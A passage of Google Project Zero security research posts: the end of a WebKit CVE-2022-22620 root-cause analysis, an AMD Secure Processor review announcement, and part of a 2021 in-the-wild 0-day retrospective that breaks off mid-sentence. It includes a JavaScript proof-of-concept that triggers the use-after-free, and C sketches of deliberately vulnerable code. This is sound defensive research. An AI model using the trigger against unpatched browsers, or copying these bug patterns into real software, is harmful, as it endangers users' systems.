The tests history-back-forward-within-subframe-hash.html and fast/history/history-traversal-is-asynchronous.html were the most helpful. We can trigger the call to loadInSameDocument by setting the history stack with an object whose location is the same page, but includes a hash. We then call history.back() to go back to that state that includes the URL with the hash. loadInSameDocument is responsible for scrolling to that location.

history.pushState("state1", "", location + "#foo");

history.pushState("state2", ""); // current state

history.back(); //goes back to state1, triggering loadInSameDocument

 

Now that I knew how to call loadInSameDocument, I teamed up with Sergei to identify how we could get user code execution sometime during the loadInSameDocument function, but prior to the call to statePopped (FrameLoader.cpp#1158):

m_frame.document()->statePopped(stateObject ? Ref<SerializedScriptValue> { *stateObject } : SerializedScriptValue::nullValue());

The callback to user code would have to occur prior to the call to statePopped because stateObject was cast to a reference there and thus would now be reference-counted. We assumed that this would be the place where the “freed” object was “used”.

If you go down the rabbit hole of the calls made in loadInSameDocument, we find that there is a path to the blur event being dispatched. We could have also used a tool like CodeQL to see if there was a path from loadInSameDocument to dispatchEvent, but in this case we just used manual auditing. The call tree to the blur event is:

FrameLoader::loadInSameDocument

  FrameLoader::scrollToFragmentWithParentBoundary

    FrameView::scrollToFragment

      FrameView::scrollToFragmentInternal

        FocusController::setFocusedElement

          FocusController::setFocusedFrame

            dispatchWindowEvent(Event::create(eventNames().blurEvent, Event::CanBubble::No, Event::IsCancelable::No));

The blur event fires on an element whenever focus is moved from that element to another element. In our case loadInSameDocument is triggered when we need to scroll to a new location within the current page. If we’re scrolling and therefore changing focus to a new element, the blur event is fired on the element that previously had the focus.

The last piece for our trigger is to free the stateObject in the onblur event handler. To do that we call replaceState, which overwrites the current history state with a new object. This causes the final reference to be dropped on the stateObject and it’s therefore free’d. loadInSameDocument still uses the free’d stateObject in its call to statePopped.

input = document.body.appendChild(document.createElement("input"));

a = document.body.appendChild(document.createElement("a"));

a.id = "foo";

history.pushState("state1", "", location + "#foo");

history.pushState("state2", "");

setTimeout(() => {

        input.focus();

        input.onblur = () => history.replaceState("state3", "");

        setTimeout(() => history.back(), 1000);

}, 1000);

In both the 2013 and 2022 cases, the root vulnerability is that the stateObject is not correctly reference-counted. In 2013, the developers did a great job of patching all the different paths to trigger the vulnerability, not just the one in the submitted proof-of-concept. This meant that they had also killed the vulnerability in loadInSameDocument. The refactoring in December 2016 then revived the vulnerability to enable it to be exploited in-the-wild and re-patched in 2022.

Conclusion

Usually when we talk about variants, they exist due to incomplete patches: the vendor doesn’t correctly and completely fix the reported vulnerability. However, for CVE-2022-22620 the vulnerability was correctly and completely fixed in 2013. Its fix was just regressed in 2016 during refactoring. We don’t know how long an attacker was exploiting this vulnerability in-the-wild, but we do know that the vulnerability existed (again) for 5 years: December 2016 until January 2022.

There’s no easy answer for what should have been done differently. The developers responding to the initial bug report in 2013 followed a lot of best-practices:

  • Patched all paths to trigger the vulnerability, not just the one in the proof-of-concept. This meant that they patched the variant that would become CVE-2022-22620.
  • Submitted a test case with the patch.
  • Detailed commit messages explaining the vulnerability and how they were fixing it.
  • Additional hardening measures during deserialization.

As an offensive security research team, we can make assumptions about what we believe to be the core challenges facing modern software development teams: legacy code, short reviewer turn-around expectations, under-appreciated and under-rewarded refactoring and security efforts, and a lack of memory safety mitigations. Developers and security teams need time to review patches, especially for security issues, and rewarding these efforts will make a difference. It also will save the vendor resources in the long run. In this case, 9 years after a vulnerability was initially triaged, patched, tested, and released, the whole process had to be duplicated again, but this time under the pressure of in-the-wild exploitation.

While this case study was a 0-day in Safari/WebKit, this is not an issue unique to Safari. Already in 2022, we’ve seen in-the-wild 0-days that are variants of previously disclosed bugs targeting Chromium, Windows, Pixel, and iOS as well. It’s a good reminder that as defenders we all need to stay vigilant in reviewing and auditing code and patches.

Release of Technical Report into the AMD Security Processor

10 May 2022 at 19:00

Posted by James Forshaw, Google Project Zero

Today, members of Project Zero and the Google Cloud security team are releasing a technical report on a security review of AMD Secure Processor (ASP). The ASP is an isolated ARM processor in AMD EPYC CPUs that adds a root of trust and controls secure system initialization. As it's a generic processor, AMD can add additional security features to the firmware, but as with all complex systems it's possible these features might have security issues which could compromise the security of everything under the ASP's management.

The security review undertaken was on the implementation of the ASP on the 3rd Gen AMD EPYC CPUs (codenamed "Milan"). One feature of the ASP of interest to Google is Secure Encrypted Virtualization (SEV). SEV adds encryption to the memory used by virtual machines running on the CPU. This feature is of importance to Confidential Computing as it provides protection of customer cloud data in use, not just at rest or when sending data across a network.

A particular emphasis of the review was on the Secure Nested Paging (SNP) extension to SEV added to "Milan". SNP aims to further improve the security of confidential computing by adding integrity protection and mitigations for numerous side-channel attacks. The review was undertaken with full cooperation with AMD. The team was granted access to source code for the ASP, and production samples to test hardware attacks.

The review discovered 19 issues which have been fixed by AMD in public security bulletins. These issues ranged from incorrect use of cryptography to memory corruption in the context of the ASP firmware. The report describes some of the more interesting issues that were uncovered during the review as well as providing a background on the ASP and the process the team took to find security issues. You can read more about the review on the Google Cloud security blog and the final report.

The More You Know, The More You Know You Don’t Know

19 April 2022 at 16:06

A Year in Review of 0-days Used In-the-Wild in 2021

Posted by Maddie Stone, Google Project Zero

This is our third annual year in review of 0-days exploited in-the-wild [2020, 2019]. Each year we’ve looked back at all of the detected and disclosed in-the-wild 0-days as a group and synthesized what we think the trends and takeaways are. The goal of this report is not to detail each individual exploit, but instead to analyze the exploits from the year as a group, looking for trends, gaps, lessons learned, successes, etc. If you’re interested in the analysis of individual exploits, please check out our root cause analysis repository.

We perform and share this analysis in order to make 0-day hard. We want it to be more costly, more resource intensive, and overall more difficult for attackers to use 0-day capabilities. 2021 highlighted just how important it is to stay relentless in our pursuit to make it harder for attackers to exploit users with 0-days. We heard over and over and over about how governments were targeting journalists, minoritized populations, politicians, human rights defenders, and even security researchers around the world. The decisions we make in the security and tech communities can have real impacts on society and our fellow humans’ lives.

We’ll provide our evidence and process for our conclusions in the body of this post, and then wrap it all up with our thoughts on next steps and hopes for 2022 in the conclusion. If digging into the bits and bytes is not your thing, then feel free to just check out the Executive Summary and Conclusion.

Executive Summary

2021 included the detection and disclosure of 58 in-the-wild 0-days, the most ever recorded since Project Zero began tracking in mid-2014. That’s more than double the previous maximum of 28 detected in 2015 and especially stark when you consider that there were only 25 detected in 2020. We’ve tracked publicly known in-the-wild 0-day exploits in this spreadsheet since mid-2014.

While we often talk about the number of 0-day exploits used in-the-wild, what we’re actually discussing is the number of 0-day exploits detected and disclosed as in-the-wild. And that leads into our first conclusion: we believe the large uptick in in-the-wild 0-days in 2021 is due to increased detection and disclosure of these 0-days, rather than simply increased usage of 0-day exploits.

With this record number of in-the-wild 0-days to analyze we saw that attacker methodology hasn’t actually had to change much from previous years. Attackers are having success using the same bug patterns and exploitation techniques and going after the same attack surfaces. Project Zero’s mission is “make 0day hard”. 0-day will be harder when, overall, attackers are not able to use public methods and techniques for developing their 0-day exploits. When we look over these 58 0-days used in 2021, what we see instead are 0-days that are similar to previous & publicly known vulnerabilities. Only two 0-days stood out as novel: one for the technical sophistication of its exploit and the other for its use of logic bugs to escape the sandbox.

So while we recognize the industry’s improvement in the detection and disclosure of in-the-wild 0-days, we also acknowledge that there’s a lot more improving to be done. Having access to more “ground truth” of how attackers are actually using 0-days shows us that they are able to have success by using previously known techniques and methods rather than having to invest in developing novel techniques. This is a clear area of opportunity for the tech industry.

We had so many more data points in 2021 to learn about attacker behavior than we’ve had in the past. Having all this data, though, has left us with even more questions than we had before. Unfortunately, attackers who actively use 0-day exploits do not share the 0-days they’re using or what percentage of 0-days we’re missing in our tracking, so we’ll never know exactly what proportion of 0-days are currently being found and disclosed publicly.

Based on our analysis of the 2021 0-days we hope to see the following progress in 2022 in order to continue taking steps towards making 0-day hard:

  1. All vendors agree to disclose the in-the-wild exploitation status of vulnerabilities in their security bulletins.
  2. Exploit samples or detailed technical descriptions of the exploits are shared more widely.
  3. Continued concerted efforts on reducing memory corruption vulnerabilities or rendering them unexploitable. Launch mitigations that will significantly impact the exploitability of memory corruption vulnerabilities.

A Record Year for In-the-Wild 0-days

2021 was a record year for in-the-wild 0-days. So what happened?

[Bar graph: number of in-the-wild 0-days detected per year, 2015-2021. Totals taken from the tracking spreadsheet: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=2129022708]

Is it that software security is getting worse? Or is it that attackers are using 0-day exploits more? Or has our ability to detect and disclose 0-days increased? When looking at the significant uptick from 2020 to 2021, we think it's mostly explained by the last of these. While we believe there has been a steady growth in interest and investment in 0-day exploits by attackers in the past several years, and that security still needs to urgently improve, it appears that the security industry's ability to detect and disclose in-the-wild 0-day exploits is the primary explanation for the increase in observed 0-day exploits in 2021.

While we often talk about “0-day exploits used in-the-wild”, what we’re actually tracking are “0-day exploits detected and disclosed as used in-the-wild”. More factors than just usage contribute to an increase in that number, most notably detection and disclosure. Better detection of 0-day exploits and more transparent disclosure of exploited 0-day vulnerabilities are positive indicators for security and progress in the industry.

Overall, we can break down the uptick in the number of in-the-wild 0-days into:

  • More detection of in-the-wild 0-day exploits
  • More public disclosure of in-the-wild 0-day exploitation

More detection

In the 2019 Year in Review, we wrote about the “Detection Deficit”. We stated “As a community, our ability to detect 0-days being used in the wild is severely lacking to the point that we can’t draw significant conclusions due to the lack of (and biases in) the data we have collected.” In the last two years, we believe that there’s been progress on this gap.

Anecdotally, we hear from more people that they’ve begun working more on detection of 0-day exploits. Quantitatively, while it is a very rough measure, we’re also seeing the number of entities credited with reporting in-the-wild 0-days increase. It stands to reason that if the number of people working on trying to find 0-day exploits increases, then the number of in-the-wild 0-day exploits detected may increase.

[Bar graph: number of distinct reporters of in-the-wild 0-day vulnerabilities per year, 2019-2021. 2019: 9, 2020: 10, 2021: 20. Data: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=2129022708]

[Line graph: in-the-wild 0-days found by the vendor in its own products per year, 2015-2021. 2015: 0, 2016: 0, 2017: 2, 2018: 0, 2019: 4, 2020: 5, 2021: 17. Data: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=2129022708]

We’ve also seen the number of vendors detecting in-the-wild 0-days in their own products increase. Whether or not these vendors were previously working on detection, they seem to have found ways to be more successful in 2021. Vendors likely have the most telemetry and overall knowledge of and visibility into their products, so it’s important that they are investing in (and hopefully having success in) detecting 0-days targeting their own products. As shown in the chart above, there was a significant increase in the number of in-the-wild 0-days discovered by vendors in their own products. Google discovered 7 of the in-the-wild 0-days in their own products and Microsoft discovered 10 in their products!

More disclosure

The second reason why the number of detected in-the-wild 0-days has increased is more disclosure of these vulnerabilities. Apple and Google Android (we differentiate “Google Android” rather than just “Google” because Google Chrome has been annotating their security bulletins for the last few years) first began labeling vulnerabilities in their security advisories with information about potential in-the-wild exploitation in November 2020 and January 2021 respectively. When vendors don’t annotate their release notes, the only way we know that a 0-day was exploited in-the-wild is if the researcher who discovered the exploitation comes forward. If Apple and Google Android had not begun annotating their release notes, the public would likely not know about at least 7 of the Apple in-the-wild 0-days and 5 of the Android in-the-wild 0-days. Why? Because these vulnerabilities were reported by “Anonymous” reporters. If the reporters didn’t want credit for the vulnerability, it’s unlikely that they would have gone public to say that there were indications of exploitation. That is 12 0-days that wouldn’t have been included in this year’s list if Apple and Google Android had not begun transparently annotating their security advisories.

[Bar graph: Android and Apple (WebKit + iOS + macOS) in-the-wild 0-days per year, split into anonymously and non-anonymously reported. 2015: 0, 2016: 3, 2018: 2, 2019: 1, 2020: 3, 2021: 8 non-anonymous and 12 anonymous (the only year with anonymously reported 0-days). Data: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=2129022708]

Kudos and thank you to Microsoft, Google Chrome, and Adobe who have been annotating their security bulletins for transparency for multiple years now! And thanks to Apache who also annotated their release notes for CVE-2021-41773 this past year.

In-the-wild 0-days in Qualcomm and ARM products were annotated as in-the-wild in Android security bulletins, but not in those vendors’ own security advisories.

It's highly likely that in 2021, there were other 0-days that were exploited in the wild and detected, but vendors did not mention this in their release notes. In 2022, we hope that more vendors start noting when they patch vulnerabilities that have been exploited in-the-wild. Until we’re confident that all vendors are transparently disclosing in-the-wild status, there’s a big question of how many in-the-wild 0-days are discovered, but not labeled publicly by vendors.

New Year, Old Techniques

We had a record number of “data points” in 2021 to understand how attackers are actually using 0-day exploits. A bit surprising to us though, there was nothing new amongst all those data points. 0-day exploits are considered one of the most advanced attack methods an actor can use, so it would be easy to conclude that attackers must be using special tricks and attack surfaces. But instead, the 0-days we saw in 2021 generally followed the same bug patterns, attack surfaces, and exploit “shapes” previously seen in public research. Once “0-day is hard”, we’d expect that, to be successful, attackers would have to find new classes of vulnerabilities in new attack surfaces using never-before-seen exploitation methods. In general, that wasn't what the data showed us this year. With two exceptions (described below in the iOS section) out of the 58, everything we saw was pretty “meh” or standard.

Out of the 58 in-the-wild 0-days for the year, 39, or 67%, were memory corruption vulnerabilities. Memory corruption vulnerabilities have been the standard for attacking software for the last few decades and it’s still how attackers are having success. Out of these memory corruption vulnerabilities, the majority also stuck with very popular and well-known bug classes (a minimal sketch of one such pattern follows the list):

  • 17 use-after-free
  • 6 out-of-bounds read & write
  • 4 buffer overflow
  • 4 integer overflow
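
To make the last bug class concrete, here is a minimal C sketch of how an integer overflow typically becomes a heap buffer overflow. This is an illustration of the general pattern only, not code from any of the 2021 exploits, and all names are invented:

```c
#include <stdint.h>
#include <stdlib.h>

/* Illustrative only: the classic integer-overflow-to-buffer-overflow
 * pattern, not code from any of the 2021 in-the-wild exploits. */
void copy_records(const uint32_t *src, uint32_t count) {
    /* BUG: if count > 0x3FFFFFFF, the 32-bit multiplication wraps,
     * so `size` is far smaller than the data we intend to copy. */
    uint32_t size = count * 4u;
    uint32_t *dst = malloc(size);        /* undersized allocation */
    if (!dst)
        return;
    for (uint32_t i = 0; i < count; i++) /* loop trusts `count`...   */
        dst[i] = src[i];                 /* ...and writes out of bounds */
    free(dst);
}
```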

In the next sections we’ll dive into each major platform that we saw in-the-wild 0-days for this year. We’ll share the trends and explain why what we saw was pretty unexceptional.

Chromium (Chrome)

Chromium had a record high number of 0-days detected and disclosed in 2021 with 14. Out of these 14, 10 were renderer remote code execution bugs, 2 were sandbox escapes, 1 was an infoleak, and 1 was used to open a webpage in Android apps other than Google Chrome.

The 14 0-day vulnerabilities were in the following components:

When we look at the components targeted by these bugs, they’re all attack surfaces seen before in public security research and previous exploits. If anything, there are a few fewer DOM bugs, and more bugs targeting other browser components like IndexedDB and WebGL, than previously. 13 out of the 14 Chromium 0-days were memory corruption bugs. Similar to last year, most of those memory corruption bugs are use-after-free vulnerabilities.

A couple of the Chromium bugs were even similar to previous in-the-wild 0-days. CVE-2021-21166 is an issue in ScriptProcessorNode::Process() in webaudio where insufficient locking left buffers accessible from both the main thread and the audio rendering thread at the same time. CVE-2019-13720, an in-the-wild 0-day from 2019, was a vulnerability in ConvolverHandler::Process() in webaudio where insufficient locking likewise left a buffer accessible from both the main thread and the audio rendering thread at the same time.
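
The underlying pattern is easier to see in miniature. The following is a simplified C sketch of that insufficient-locking pattern; it is not Chromium code, all names are invented, and the lock is deliberately shown covering too little:

```c
#include <pthread.h>
#include <stdlib.h>

/* Invented sketch, not Chromium code: a buffer shared between the main
 * thread and an audio rendering thread, where the lock does not cover
 * the render thread's entire use of the buffer. */
typedef struct {
    float *samples;
    size_t len;
    pthread_mutex_t lock;
} shared_buffer;

/* Main thread: swaps the buffer under the lock, then frees the old one
 * even though the render thread may still be using it. */
void main_thread_replace(shared_buffer *b, size_t new_len) {
    float *fresh = calloc(new_len, sizeof(float));
    if (!fresh)
        return;
    pthread_mutex_lock(&b->lock);
    float *old = b->samples;
    b->samples = fresh;
    b->len = new_len;
    pthread_mutex_unlock(&b->lock);
    free(old);                     /* render thread may still hold `old` */
}

/* Render thread: BUG -- grabs the pointer under the lock but keeps
 * using it after dropping the lock, racing with the free() above. */
void render_thread_process(shared_buffer *b) {
    pthread_mutex_lock(&b->lock);
    float *cur = b->samples;
    size_t n = b->len;
    pthread_mutex_unlock(&b->lock);
    for (size_t i = 0; i < n; i++) /* use-after-free if buffer replaced */
        cur[i] *= 0.5f;
}
```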

CVE-2021-30632 is another Chromium in-the-wild 0-day from 2021. It’s a type confusion in the TurboFan JIT in V8, Chromium’s JavaScript engine, where TurboFan fails to deoptimize code after a property map is changed. CVE-2021-30632 in particular deals with code that stores global properties. CVE-2020-16009 was also an in-the-wild 0-day that was due to TurboFan failing to deoptimize code after map deprecation.
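
As a rough, language-agnostic illustration of that “missed deoptimization” pattern, here is a hedged C sketch. It is emphatically not V8 code and all names are invented; it only shows the shape of the bug: a fast path specialized on an object’s layout that is never invalidated when the layout changes.

```c
/* Invented sketch of the missed-deoptimization pattern, not V8 code:
 * a fast path is specialized once on an object's layout ("map"), and
 * nothing tears the fast path down when the layout later changes. */
enum shape { SHAPE_DOUBLE, SHAPE_POINTER };

struct object {
    enum shape shape;
    union { double num; char *str; } payload;
};

static enum shape specialized_for; /* layout the fast path was built for */
static int is_specialized;

double fast_get_number(struct object *o) {
    if (!is_specialized) {         /* the check runs once, at "JIT time" */
        specialized_for = o->shape;
        is_specialized = 1;
    }
    /* BUG: if o->shape later became SHAPE_POINTER, this path should
     * have been deoptimized; instead it reinterprets a pointer as a
     * double -- a type confusion. */
    return o->payload.num;
}
```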

WebKit (Safari)

Prior to 2021, Apple had acknowledged only 1 publicly known in-the-wild 0-day targeting WebKit/Safari, and only because an external researcher shared that information. In 2021 there were 7. This makes it hard for us to assess trends or changes since we don’t have historical samples to compare against. Instead, we’ll look at 2021’s WebKit bugs in the context of other Safari bugs not known to be in-the-wild and other browser in-the-wild 0-days.

The 7 in-the-wild 0-days targeted the following components:

The one semi-surprise is that no DOM bugs were detected and disclosed. In previous years, vulnerabilities in the DOM engine have generally made up 15-20% of the in-the-wild browser 0-days, but none were detected and disclosed for WebKit in 2021.

It would not be surprising if attackers are beginning to shift to other modules, such as third-party libraries or components like IndexedDB. These modules may be more promising to attackers going forward because there’s a better chance that the vulnerability exists in multiple browsers or platforms. For example, the webaudio bug in Chromium, CVE-2021-21166, also existed in WebKit and was fixed as CVE-2021-1844, though there was no evidence it was exploited in-the-wild in WebKit. The IndexedDB in-the-wild 0-day that was used against Safari in 2021, CVE-2021-30858, was very, very similar to a bug fixed in Chromium in January 2020.

Internet Explorer

Since we began tracking in-the-wild 0-days, Internet Explorer has had a pretty consistent number of 0-days each year. 2021 actually tied 2016 for the most in-the-wild Internet Explorer 0-days we’ve ever tracked even though Internet Explorer’s market share of web browser users continues to decrease.

[Bar graph: Internet Explorer in-the-wild 0-days discovered per year, 2015-2021. 2015: 3, 2016: 4, 2017: 3, 2018: 1, 2019: 3, 2020: 2, 2021: 4. Data: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=2129022708]

So why are we seeing so little change in the number of in-the-wild 0-days despite the falling market share? Internet Explorer is still a ripe attack surface for initial entry into Windows machines, even if the user doesn’t use Internet Explorer as their web browser. While the number of 0-days stayed pretty consistent with what we’ve seen in previous years, the components targeted and the delivery methods of the exploits changed. 3 of the 4 0-days seen in 2021 targeted the MSHTML browser engine and were delivered via methods other than the web. Instead they were delivered to targets via Office documents or other file formats.

The four 0-days targeted the following components:

For CVE-2021-26411, targets of the campaign initially received a .mht file, which prompted the user to open it in Internet Explorer. Once it was opened in Internet Explorer, the exploit was downloaded and run. CVE-2021-33742 and CVE-2021-40444 were delivered to targets via malicious Office documents.

CVE-2021-26411 and CVE-2021-33742 followed two common memory corruption bug patterns: a use-after-free, in which a user-controlled callback runs in between two actions using an object and the user frees the object during that callback, and a buffer overflow. A sketch of the callback use-after-free pattern follows.
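
The sketch below is in C and is purely illustrative, not Internet Explorer code; all names are invented:

```c
/* Invented sketch of the callback use-after-free pattern, not actual
 * browser code: an object is used, a user-controlled callback runs,
 * and the object is used again -- but the callback freed it. */
struct element {
    void (*on_change)(void *ctx); /* attacker-controlled script callback */
    void *ctx;
    int value;
};

void update_element(struct element *e, int v) {
    e->value = v;                 /* first use of the object */
    if (e->on_change)
        e->on_change(e->ctx);     /* script runs here and can free `e` */
    e->value = v + 1;             /* BUG: second use without rechecking
                                     that `e` is still alive (UAF) */
}
```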

The exploit chain built around CVE-2021-40444 used a few different vulnerabilities, but the one within MSHTML meant that as soon as the Office document was opened the payload would run: a CAB file was downloaded, decompressed, and then a function from within a DLL in that CAB was executed. Unlike the previous two MSHTML bugs, this was a logic error in URL parsing rather than a memory corruption bug.

Windows

Windows is the platform where we’ve seen the most change in components targeted compared with previous years. However, this shift has generally been in progress for a few years, and was predicted with the end-of-life of Windows 7 in 2020, which is why it’s still not especially novel.

In 2021 there were 10 Windows in-the-wild 0-days targeting 7 different components:

The number of different components targeted is what shifted from past years. For example, in 2019 75% of Windows 0-days targeted Win32k, while in 2021 Win32k only made up 20% of the Windows 0-days. The reason this was expected and predicted is that 6 out of 8 of the 0-days that targeted Win32k in 2019 did not target the latest release of Windows 10 at that time; they were targeting older versions. With Windows 10, Microsoft began dedicating more and more resources to locking down the attack surface of Win32k, so as those older versions hit end-of-life, Win32k becomes a less and less attractive attack surface.

Similar to the many Win32k vulnerabilities seen over the years, the two 2021 Win32k in-the-wild 0-days are due to custom user callbacks. The attacker calls functions that change the state of an object during the callback, and Win32k does not correctly handle those changes. CVE-2021-1732 is a type confusion vulnerability due to a user callback in xxxClientAllocWindowClassExtraBytes which leads to out-of-bounds read and write. If NtUserConsoleControl is called during the callback, a flag is set in the window structure to signal that a field is an offset into the kernel heap. xxxClientAllocWindowClassExtraBytes doesn’t check this flag and writes that field as a user-mode pointer without clearing it. The first in-the-wild 0-day detected and disclosed in 2022, CVE-2022-21882, exists because CVE-2021-1732 was not completely fixed: the attackers found a way to bypass the original patch and still trigger the vulnerability. CVE-2021-40449 is a use-after-free in NtGdiResetDC due to the object being freed during the user callback. A sketch of the CVE-2021-1732-style flag confusion follows.
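
The following is a rough C sketch of that flag-confusion pattern. It assumes invented names, an invented flag value, and a stubbed-out callback; it is not actual Win32k code:

```c
#include <stdint.h>

#define FLAG_FIELD_IS_OFFSET 0x800 /* invented flag value */

/* Invented stand-in for the window class structure: `extra_bytes` is
 * interpreted as either a user-mode pointer or a kernel heap offset,
 * depending on the flag. */
struct window_class {
    uint32_t flags;
    uintptr_t extra_bytes;
};

/* Stub for the user-mode callback; in the real bug, user code runs
 * here and can make other syscalls before returning a pointer. */
static uintptr_t call_user_mode_callback(void) { return 0x41414000; }

/* Reachable from a syscall (NtUserConsoleControl in the real bug)
 * that the attacker can invoke during the callback above. */
void convert_to_offset(struct window_class *wc, uintptr_t kernel_offset) {
    wc->extra_bytes = kernel_offset;
    wc->flags |= FLAG_FIELD_IS_OFFSET;
}

void alloc_extra_bytes(struct window_class *wc) {
    uintptr_t user_ptr = call_user_mode_callback();
    /* BUG: should recheck FLAG_FIELD_IS_OFFSET here. The field is now
     * flagged as a kernel heap offset, yet an attacker-chosen user-mode
     * value is written into it, so the kernel later treats that value
     * as an offset into its own heap. */
    wc->extra_bytes = user_ptr;
}
```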

iOS/macOS

As discussed in the “More disclosure” section above, 2021 was the first full year that Apple annotated their release notes with in-the-wild status of vulnerabilities. 5 iOS in-the-wild 0-days were detected and disclosed this year. The first publicly known macOS in-the-wild 0-day (CVE-2021-30869) was also found. In this section we’re going to discuss iOS and macOS together because: 1) the two operating systems include similar components and 2) the sample size for macOS is very small (just this one vulnerability).

[Bar graph: macOS and iOS in-the-wild 0-days discovered per year. macOS: 0 every year except 2021, when 1 was discovered. iOS: 2015: 0, 2016: 2, 2017: 0, 2018: 2, 2019: 0, 2020: 3, 2021: 5. Data: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=2129022708]

For the 5 total iOS and macOS in-the-wild 0-days, they targeted 3 different attack surfaces:

These attack surfaces are not novel. IOMobileFrameBuffer has been a target of public security research for many years. For example, the Pangu Jailbreak from 2016 used CVE-2016-4654, a heap buffer overflow in IOMobileFrameBuffer. IOMobileFrameBuffer manages the screen’s frame buffer. For iPhone 11 (A13) and below, IOMobileFrameBuffer was a kernel driver. Beginning with A14, it runs on a coprocessor, the DCP. It’s a popular attack surface because historically it’s been accessible from sandboxed apps. In 2021 there were two in-the-wild 0-days in IOMobileFrameBuffer. CVE-2021-30807 is an out-of-bounds read and